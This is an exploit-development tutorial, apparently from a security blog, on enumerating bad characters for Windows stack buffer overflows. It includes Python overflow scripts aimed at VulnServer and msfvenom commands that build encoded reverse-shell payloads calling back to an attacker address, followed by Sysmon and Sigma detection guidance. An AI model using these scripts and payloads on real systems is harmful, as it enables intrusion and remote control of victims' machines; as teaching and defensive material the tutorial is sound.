Bad Characters, Null Bytes, and Restricted Character Sets
Objective: Understand why certain bytes corrupt, truncate, or transform shellcode in stack-based buffer overflows, how to systematically enumerate a target’s restricted character set, and how to adapt encoding or instruction substitution to survive those constraints — alongside how defenders detect the resulting exploitation patterns.
Contents
- 1 1. What Are Bad Characters? The Concept Explained
- 2 2. Why \x00 Is Always the First Enemy
- 3 3. Common Bad Characters by Protocol and Context
- 4 4. Building and Sending the Test Byte Array
- 5 5. Inspecting Memory: Immunity Debugger and mona.py
- 6 6. Iterative Elimination: Narrowing the Bad List
- 7 7. Encoding Shellcode with msfvenom
- 8 8. Alphanumeric and Printable-Only Constraints
- 9 9. Instruction Substitution: Jumping Without Bad Opcodes
- 10 10. Unicode / Wide-Character Transformations
- 11 11. Common Attacker Techniques
- 12 12. Defensive Strategies & Detection
- 13 13. Tools for Bad-Character Analysis
- 14 14. MITRE ATT&CK Mapping
- 15 Summary
- 16 Related Tutorials
- 17 References
1. What Are Bad Characters? The Concept Explained
A bad character is any byte that causes the vulnerable application’s input-handling routine to misbehave: corrupt, truncate, or transform the payload before it reaches EIP. There is no universal set. The exact bad characters depend on the application’s parsing logic and the protocol in use.
Shellcode cannot contain bytes that the target interprets incorrectly — a newline, a delimiter, or a string terminator. The root cause is usually a string-handling function. C runtime (CRT) routines like strcpy, strncpy, strcat, sprintf, and the deprecated gets operate on null-terminated buffers and stop on specific sentinel bytes.
When you inspect memory after a crash, you are hunting for three distinct failure modes:
- Missing bytes — characters stripped entirely by a sanitiser.
- Altered bytes — characters transformed (e.g.,
\x80appearing as\x01). - Premature termination — a byte that halts the copy, so nothing after it is written.
Identifying which bytes trigger these behaviors is a mandatory phase before any reliable shellcode can be placed.

2. Why \x00 Is Always the First Enemy
The null byte (\x00) is always a bad character in string-based overflows. C-style string functions treat \x00 as the terminator, so any shellcode byte following a null is silently discarded.
| Function | Behavior on \x00 |
|---|---|
strcpy | Stops copying at the first null |
strncpy | Stops at null or n bytes |
strlen | Returns length up to first null |
sprintf | Terminates the formatted string |
gets | Legacy, present in old targets |
At the assembly level, strlen walks the buffer comparing each byte to zero and breaks on a match — that loop defines the truncation boundary. This is not a convention; it is a property of how the Windows CRT and Win32 LPSTR / LPWSTR parameters handle null-terminated strings.
Network contexts differ. A socket recv call reads a fixed byte count and will pass null bytes through the wire into the buffer. So \x00 may survive transport but still die the moment the data hits a strcpy. Treat the string API and the socket as separate constraint layers.
3. Common Bad Characters by Protocol and Context
Restrictions come from three sources: protocol-specific rules (HTTP terminating on \x0D\x0A), application sanitisation (stripping nulls or high bytes), and encoding layers (Base64 or Unicode transformations).
| Byte | Hex | Reason |
|---|---|---|
| Null | \x00 | String terminator — always bad in string overflows |
| Line Feed | \x0A | Newline — terminates input in many protocol parsers |
| Carriage Return | \x0D | CR — terminates input lines (HTTP, SMTP, POP3) |
| Space | \x20 | Whitespace delimiter — terminates tokens in some parsers |
| Form Feed | \xFF | Causes issues in some parsing contexts |
A web server vulnerable in its URI handler is the canonical restricted-set case: the legal URI character set is small, and non-printable or extended characters are rejected outright, narrowing or preventing exploitation. SMTP, POP3, and FTP argument parsers each impose their own delimiters.
4. Building and Sending the Test Byte Array
The standard methodology: generate every non-null byte (\x01–\xFF), place it after the EIP-overwrite offset, crash the target, and compare sent versus received in memory. Python builds the array cleanly:
# Generate \x01 through \xFF (255 bytes, null excluded)
badchar_test = bytearray(range(1, 256))
offset = 2003 # VulnServer TRUN EIP offset (illustrative)
buf = b"A" * offset
buf += b"B" * 4 # EIP overwrite marker
buf += bytes(badchar_test) # byte array lands at ESP
buf += b"C" * (3000 - len(buf)) # paddingYou then deliver that buffer to the vulnerable service running under a debugger:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.56.10", 9999))
s.recv(1024)
s.send(b"TRUN /.:/" + buf) # VulnServer TRUN command
s.close()After the crash, the \x01–\xFF block should appear contiguously in memory, typically at or near ESP.
5. Inspecting Memory: Immunity Debugger and mona.py
In Immunity Debugger, follow ESP in the hex dump and use the mona plugin to diff what you sent against what landed.
!mona config -set workingfolder c:\mona\%p
!mona bytearray -cpb "\x00"
!mona compare -f c:\mona\bytearray.bin -a <ESP_address>!mona configsets the output directory.!mona bytearray -cpb "\x00"writes a referencebytearray.bin(all\x01–\xFF) excluding the specified bad chars.!mona comparediffs the reference file against the live memory at the suppliedESPaddress and prints a per-byte verdict.
Annotated mona output looks like:
[+] Comparing with memory at address 0x00ab1a30
Only the first 18 bytes were identical
Possibly bad chars: 0a 0d
[+] Bytes omitted from input: ...6. Iterative Elimination: Narrowing the Bad List
Mona flags where the sequence diverges. The critical nuance: only the first byte of a corrupted run is necessarily bad. Subsequent corruption is often a knock-on effect of that first offender shifting alignment.
If memory shows 11 12 13 15 with 14 missing, then \x14 is the only confirmed bad character at that step — not \x15 or anything after it. Add \x14 to your exclusion list, regenerate, and re-run:
BADCHARS = b"\x00\x0a\x0d" # grows one confirmed byte per pass
full = bytearray(range(1, 256))
test = bytes(b for b in full if b not in BADCHARS)
# rebuild buffer with `test`, resend, re-inspect under the debuggerRepeat the send → inspect → eliminate cycle until the entire \x01–\xFF block (minus the confirmed bad bytes) appears intact at ESP. Mirror the same exclusion list in !mona bytearray -cpb "..." so the reference file matches.

7. Encoding Shellcode with msfvenom
Once the bad-char set is known, generate shellcode that avoids it. msfvenom‘s -b flag specifies the forbidden bytes; it then picks an encoder — x86/shikata_ga_nai by default — to re-encode around them.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
-b '\x00\x0a\x0d\x20' -e x86/shikata_ga_nai -f pythonx86/shikata_ga_nai (ranked excellent) is a polymorphic XOR additive-feedback encoder. It reorders instructions and dynamically selects registers, producing different output each run and frustrating signature-based detection.
Size overhead is real. Encoding inflates the payload — a 71-byte stub can grow to 98 bytes after one shikata_ga_nai pass. Account for buffer space accordingly.
Failure case: when the bad-char list is too restrictive, shikata_ga_nai may abort with "A valid opcode permutation could not be found". Fall back to an alternative encoder:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
-b '\x00\x0a\x0d\x20\xff' -e x86/call4_dword_xor -f pythonx86/call4_dword_xor and x86/countdown use different decoder stubs that may satisfy tighter constraints.

8. Alphanumeric and Printable-Only Constraints
When so many bytes are forbidden that standard encoders fail, switch to printable-ASCII-only output. x86/alpha_mixed (msfvenom) and the standalone Alpha2 tool emit shellcode confined to the \x21–\x7E printable range — ideal when the target only passes printable URI characters.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
-e x86/alpha_mixed BufferRegister=ESP -f pythonThe BufferRegister option tells the decoder which register points to the payload, removing the self-locating GetPC stub. The trade-off is size — an alphanumeric payload can balloon to 710 bytes or more. When the available buffer cannot hold an inflated payload, stage a small egghunter to search memory for a larger second-stage payload placed elsewhere.
9. Instruction Substitution: Jumping Without Bad Opcodes
Sometimes the bad character lives in your jump opcode, not your shellcode body. The short JMP maps to \xEB, and \xEB is frequently bad in HTTP and other network-protocol targets — so the instruction cannot be used as-is.
| Instruction | Opcode bytes | Notes |
|---|---|---|
JMP SHORT +6 | \xEB \x06 | \xEB often restricted |
JE / JNE pair | \x74 .. \x75 .. | Two complementary branches always taken together |
Near JMP | \xE9 .. .. .. .. | Alternative when \xEB is bad |
A bad-char-safe substitution uses a conditional pair that, regardless of the zero flag, always transfers control:
; JMP SHORT replacement using complementary conditionals
je short target ; 74 xx -> jump if ZF=1
jne short target ; 75 xx -> jump if ZF=0
; one branch is always taken; no \xEB byte present
target:
; decoder / shellcode continues hereIn SEH overwrites, the 4-byte nSEH field typically holds a JMP SHORT to the handler stub — its opcode bytes must also dodge the bad-char set. Use mona or WinDbg to locate suitable jump equivalents and clean POP POP RET gadgets.
10. Unicode / Wide-Character Transformations
A distinct constraint class: some applications convert input via MultiByteToWideChar() (Win32) or mbstowcs() (CRT), expanding each byte to a wide character and effectively inserting a null after every byte. This breaks shellcode alignment entirely — it is transformation, not stripping.
# You send: \x41\x42
# Memory shows: \x41\x00\x42\x00 <- every odd byte zeroed
sent = b"\x41\x42"
observed = b"\x41\x00\x42\x00" # Unicode expansion in the debuggerA naive \x01–\xFF array will look catastrophically corrupted under this transformation because every byte appears null-padded. The classical mitigation is Venetian shellcode — manually constructed so that the injected null bytes become harmless padding instructions, letting the real opcodes survive expansion. Identify these buffers by spotting the regular \x00 interleave in the hex dump.
11. Common Attacker Techniques
| Technique | Description |
|---|---|
| Bad-char enumeration | Inject \x01–\xFF, diff memory, identify forbidden bytes |
| Shellcode encoding | Re-encode with shikata_ga_nai / call4_dword_xor to avoid bad bytes |
| Alphanumeric shellcode | alpha_mixed / Alpha2 for printable-only constraints |
| Jump substitution | Replace \xEB with JE/JNE pairs or near JMP |
| Venetian shellcode | Survive Unicode expansion in wide-character buffers |
| Egghunter staging | Small finder stub locating a larger payload in tight buffers |
These are pre-exploitation tradecraft — they enable shellcode delivery but execution and payload behavior are what generate detectable telemetry.
12. Defensive Strategies & Detection
Bad-char testing itself is quiet, but the encoded shellcode it produces is loud once it executes from unbacked memory.
| Event ID | Name | Relevance |
|---|---|---|
1 | Process Creation | Frameworks (Metasploit, Empire) launching payloads |
3 | Network Connection | Outbound C2 from an exploited process |
8 | CreateRemoteThread | Post-exploitation thread injection |
10 | ProcessAccess | Cross-process open by injected payload |
11 | FileCreate | Shellcode or payload dropped to disk |
Sysmon Event ID 10 (ProcessAccess) is the primary signal. Shellcode executing from anonymous stack or heap memory produces a CallTrace containing UNKNOWN frames — code with no backing image on disk.
title: Shellcode Injection via Suspicious Process Access
logsource:
category: process_access
product: windows
detection:
selection:
EventID: 10
GrantedAccess:
- '0x147a'
- '0x1f3fff'
CallTrace|contains: 'UNKNOWN'
condition: selection
level: highAdditional telemetry and hardening:
- ETW — subscribe to
Microsoft-Windows-Threat-Intelligence(ETWTI) to observe injection and memory manipulation;Microsoft-Windows-Security-Auditingfor process audit events. - Audit Process Creation (Detailed Tracking) → Security Event
4688with command-line logging captures framework invocations. - WAF / network — flag URI patterns carrying buffer-overflow payloads; a burst of access-violation or segfault alerts in a short window signals active exploitation attempts.
- Compiler mitigations —
/GS,/SAFESEH,/DYNAMICBASE,/NXCOMPATraise the exploitation bar. - Input validation — allowlist legal characters at the boundary; explicitly reject
\x00,\x0A,\x0D. - WDEG — enforce DEP and CFG per-process via
Set-ProcessMitigation. - Memory integrity — flag executable pages not backed by a known on-disk image.
- Deploy Sysmon with a community baseline (SwiftOnSecurity, olafhartong sysmon-modular) to ensure EID
10capturesCallTrace.

13. Tools for Bad-Character Analysis
| Tool | Description | Link |
|---|---|---|
| Immunity Debugger | Crash analysis, ESP dump inspection | immunityinc.com |
| mona.py | Bytearray generation and memory comparison | github.com/corelan |
| WinDbg | Opcode/gadget inspection, memory diffing | microsoft.com |
| msfvenom | Shellcode generation and encoding (-b) | offsec.com |
| Alpha2 | Standalone alphanumeric shellcode encoder | github.com |
| x64dbg | User-mode debugging and patching | x64dbg.com |
| Ghidra | Static opcode/disassembly analysis | ghidra-sre.org |
| Volatility | Memory forensics, unbacked code regions | volatilityfoundation.org |
14. MITRE ATT&CK Mapping
Bad-char testing and shellcode crafting are pre-exploitation tradecraft with no standalone technique ID — they enable the techniques below.
| Technique | MITRE ID | Detection |
|---|---|---|
| Exploitation for Client Execution | T1203 | Process crash bursts, EID 1 framework launches |
| Exploit Public-Facing Application | T1190 | WAF anomalies, service access violations |
| Exploitation for Privilege Escalation | T1068 | Local overflow → elevated process behavior |
| Obfuscated Files or Information | T1027 | Encoder signatures (shikata/alpha) on disk/wire |
| Process Injection | T1055 | Sysmon EID 8/10, UNKNOWN in CallTrace |
Summary
- Bad characters are application-defined bytes that corrupt, truncate, or transform shellcode before it reaches
EIP— you must enumerate them empirically, never assume. \x00is always bad in string-based overflows because CRT functions likestrcpyandstrlentreat it as the terminator; sockets pass it but downstream string APIs still die on it.- Enumerate with a
\x01–\xFFbyte array, diff memory using!mona compare, and remember only the first byte of a corrupted run is confirmed bad. - Adapt with
msfvenom -bencoding (shikata_ga_nai, falling back tocall4_dword_xororalpha_mixed), jump-opcode substitution, and Venetian shellcode for Unicode buffers. - Detect the resulting payloads via Sysmon Event ID
10withUNKNOWNCallTraceframes, ETWTI injection telemetry, and process-creation auditing (4688).
Related Tutorials
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
- Egghunters: Staged Payload Delivery When Buffer Space Is Tight
- Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
- Writing Your First Shellcode: x86 Reverse Shell from Scratch
References
- CAPEC-52: Embedding NULL Bytes – MITRE CAPEC
- CWE-158: Improper Neutralization of Null Byte or NUL Character – MITRE CWE
- Exploit Writing Tutorial Part 9: Introduction to Win32 Shellcoding (Bad Characters) – Corelan
- Exploit Writing Tutorial Part 1: Stack Based Overflows (Bad Characters & Restricted Chars) – Corelan
- Embedding Null Code – OWASP Foundation
- Exploiting x86 Stack Based Buffer Overflows (Null Bytes & Shellcode) – Exploit-DB
Get new drops in your inbox
Windows internals, exploit dev, and red-team write-ups — no spam, unsubscribe anytime.